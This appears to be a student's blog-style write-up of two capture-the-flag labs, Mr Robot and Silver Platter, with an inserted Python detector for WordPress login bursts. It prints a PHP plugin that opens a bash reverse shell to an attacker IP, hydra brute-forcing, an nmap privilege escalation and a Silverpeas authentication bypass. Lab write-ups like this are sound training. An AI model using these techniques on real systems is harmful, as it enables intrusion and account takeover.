Today was really cool. We did the Mr Robot CTF challenge today and by the end of the day Kevin gave us more challenges to do.
The lab only asks for three keys and doesn’t provide any info. So, the first thing I did was an nmap scan.
Since ports 80 and 443 were open, I opened a browser to see what’s inside. The main website was all about Mr Robot references, which I kind of enjoyed.
After that I used gobuster:
gobuster dir -u http://10.10.122.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
That’s when things got interesting. I found some useful directories, including the first key and a custom dictionary file. (Side note: Mathieu later told me the username and password were literally just hidden in plain sight on one of those pages. Scroll down, people!)
I only tried to use that dictionary after rockyou.txt and wasted some time on it, but I learned I should’ve probably paid more attention. I just didn’t think it was very realistic to put a dictionary with their password inside the website.
So, to find the right username I used hydra with the http-post-form module: F=Invalid username.
Then I did the same thing to find the password and logged into the WordPress site.
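Added example (not from the post): on the defender's side of the hydra step above, a small Python detector that flags bursts of failed wp-login.php POSTs from one source in constructed Apache-style access log lines. The log lines, the threshold and the window are assumptions; WordPress answers a failed login by re-rendering the form (200) and a successful one with a redirect (302).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined format (not real traffic).
# 203.0.113.7 hammers wp-login.php and finally succeeds (302);
# 198.51.100.9 is a single ordinary failed login.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/4.0 (Hydra)"
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/4.0 (Hydra)"
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/4.0 (Hydra)"
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/4.0 (Hydra)"
203.0.113.7 - - [10/Oct/2024:13:55:39 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/4.0 (Hydra)"
203.0.113.7 - - [10/Oct/2024:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/4.0 (Hydra)"
203.0.113.7 - - [10/Oct/2024:13:55:42 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0 (Hydra)"
198.51.100.9 - - [10/Oct/2024:13:56:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format line; return None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}

def detect_login_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: peak count} for sources whose failed wp-login.php POSTs
    inside any sliding window of `window` reach `threshold`."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # A failed WordPress login re-renders the form with 200; success is a 302.
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php") and rec["status"] == 200:
            failures[rec["ip"]].append(rec["ts"])
    hits = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = max(hits.get(ip, 0), end - start + 1)
    return hits  # on SAMPLE_LOG: {'203.0.113.7': 6}
```

In practice the same logic belongs in a fail2ban-style jail or a SIEM rule; the point here is which status code marks a failure and that a burst, not a single POST, is the signal.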
Now, how could I create a reverse shell? I can create a simple plugin:
<?php
/*
Plugin Name: Shell
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.21.157.185/1337 0>&1'");
?>
With my listener running, I triggered the plugin and boom, reverse shell acquired.
After running some recon commands (whoami, pwd) I used:
find / -perm -4000 -type f 2>/dev/null
And I found an old version of nmap, which can be used to escalate privileges on the machine using the --interactive option.
After that I just located the flags with:
find / -name "key-2-of-3.txt" 2>/dev/null
It was a really fun challenge!
By the end of the day I started another challenge with Adil and Mathieu. It was called Silver Platter. Now this was a tough one.
We scanned the target and found some open ports. We used gobuster but had no luck there either.
Adil tried to brute-force SSH with a user we found on a website but we got nothing. Then he had to leave for a meeting he was gonna have with some of our other classmates in Berlin. Wish I could have had some beers with them too!
It was me and Mathieu now. We spent so much time doing recon. I was lost, but then Mathieu found something: silverplatter.thm:8080/silverpeas
That was what we needed to get started and from there we found the platform was vulnerable to a trivial authentication bypass: https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d
We just had to remove the password field in the authentication request.
Then we logged in with the account from earlier and got our first flag!
After that we spent some time trying to figure out the next step, and I finally found some other users on the platform, used the same method to bypass authentication and logged in as Manager.
We got ssh credentials!
After that it was the tricky part. I ran:
find / -perm -4000 -type f 2>/dev/null
And found a vulnerability in Pkexec.
Then we both tried the Pwnkit exploit to escalate our way to the root user, but nothing was working. I tried that for maybe 2 hours. I was always getting an error and trying to fix it, but I just couldn’t make it work.
Eventually, we dug into system logs and discovered that the user Tyler had root privileges. Since Tim was in the admin group, he had access to logs, where we found a database password and it worked for Tyler!
Logged in as root at last… to find the last flag!
It ONLY took us six hours to complete the Silver Platter challenge. Kevin did warn us we’d be here all night. Back-to-back CTFs like this are exhausting but very rewarding.
